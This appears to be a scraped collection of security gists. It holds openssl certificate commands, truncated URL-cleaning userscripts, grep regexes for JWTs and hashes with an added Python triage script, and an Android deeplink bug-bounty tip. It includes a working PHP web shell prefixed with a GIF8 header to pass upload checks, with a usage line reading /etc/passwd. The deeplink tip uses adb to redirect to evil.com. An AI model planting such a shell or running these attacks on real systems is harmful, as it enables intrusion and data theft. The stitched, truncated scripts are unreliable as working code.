openssl s_client -state -connect postman-echo.com:443 | openssl x509 -text
openssl x509 -inform DER -in cacert.der -out cacert.pem
openssl x509 -inform der -in cacert.der -out cacert.crt
// ==UserScript==
// @name Remove-UTM-from-URL
// @namespace parameter_blocker
// @description Removes UTM from url (by reloading)
// @version 1.0
// @include https://www.naukri.com/job-listings*
// @run-at document-start
// ==/UserScript==
var loc = window.top.location.toString();
GIF8;
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
<!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd -->
grep -Porn <pattern>
P: Use Perl engine, grep can't run modern regexes otherwise
o: Only show the matching part, not the whole line
r: Search recursively
n: Print line number of matches
Bonus: use -Porh to exclude filenames from output i.e. only show matches. Great for piping.
Regex to match JWTs
[= ]eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*
Regex to match MD2, MD4, MD5, SHA224, SHA256, SHA384, SHA512 hashes in case someone needs it.
([a-fA-F0-9]{32}(?:[a-fA-F0-9]{8})?(?:[a-fA-F0-9]{16})?(?:[a-fA-F0-9]{8})?(?:[a-fA-F0-9]{32})?(?:[a-fA-F0-9]{32})?)
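An added example (not part of the original gists) for triaging hits from the two regexes above when sweeping logs or source for leaked tokens and digests: it confirms a JWT candidate by decoding its header and labels hex matches by length. The sample lines, the token and the helper names are constructed for illustration.

```python
import base64
import hashlib
import json
import re

# The two patterns from the page, unchanged.
JWT_RE = re.compile(r"[= ]eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*")
HASH_RE = re.compile(
    r"([a-fA-F0-9]{32}(?:[a-fA-F0-9]{8})?(?:[a-fA-F0-9]{16})?"
    r"(?:[a-fA-F0-9]{8})?(?:[a-fA-F0-9]{32})?(?:[a-fA-F0-9]{32})?)")
HASH_BY_LEN = {32: "MD2/MD4/MD5", 56: "SHA224", 64: "SHA256",
               96: "SHA384", 128: "SHA512"}

def b64url(obj):
    raw = json.dumps(obj, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).decode().rstrip("=")

# Constructed sample data; the signature segment is a placeholder, not a real MAC.
TOKEN = b64url({"alg": "HS256", "typ": "JWT"}) + "." + b64url({"sub": "demo"}) + ".c2ln"
SAMPLE = [
    "GET /api?token=" + TOKEN + " HTTP/1.1",
    "note: eyJunk.notatoken is not a token",
    "md5 " + hashlib.md5(b"constructed").hexdigest(),
    "sha1 " + hashlib.sha1(b"constructed").hexdigest(),
    "sha256 " + hashlib.sha256(b"constructed").hexdigest(),
]

def jwt_header(candidate):
    """Return the header dict if the first segment decodes to JSON with 'alg'."""
    seg = candidate[1:].split(".", 1)[0]  # drop the leading '=' or ' '
    try:
        hdr = json.loads(base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4)))
    except ValueError:  # bad base64, bad UTF-8 or bad JSON
        return None
    return hdr if isinstance(hdr, dict) and "alg" in hdr else None

def scan(lines):
    """Like grep -Pon: return (line_no, kind, match) for every hit."""
    hits = []
    for no, line in enumerate(lines, 1):
        for m in JWT_RE.finditer(line):
            kind = "jwt" if jwt_header(m.group()) else "jwt-lookalike"
            hits.append((no, kind, m.group()[1:]))
        for m in HASH_RE.finditer(line):
            kind = HASH_BY_LEN.get(len(m.group()), "hex, unlisted length")
            hits.append((no, kind, m.group()))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(*hit)
```

The 40-character SHA-1 digest in the sample shows that the hash pattern also matches hex runs whose length is not one of the listed digest sizes, so length alone should not be read as proof of the algorithm.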
// ==UserScript==
// @name Remove_Params
// @namespace parameter_blocker
// @description Remove any parameter from the url
// @version 1.0
// @include *
// @run-at document-start
// ==/UserScript==
var loc = window.top.location.toString();
You must love #Android deeplinks! They are the easiest way to get bounties
Decompile an app with jadx
Collect all deeplink handlers from AndroidManifest.xml, they look like
Grep among all sources and resources a pattern from a handler, in this case, airbnb://d
You could find a lot of hardcoded urls like airbnb://d/openurl?url=https:// http://airbnb.com/blabla. That's much simpler than learning app's sources
Now try to put your own domains with adb (adb shell am start -a android.intent.action.VIEW -d airbnb://d/openurl?url=http:// http://evil.com) or on HTML pages (check out the H1 report below)
Repeat the same thing for iOS apps. Usually, functionality is similar, but actual implementations are different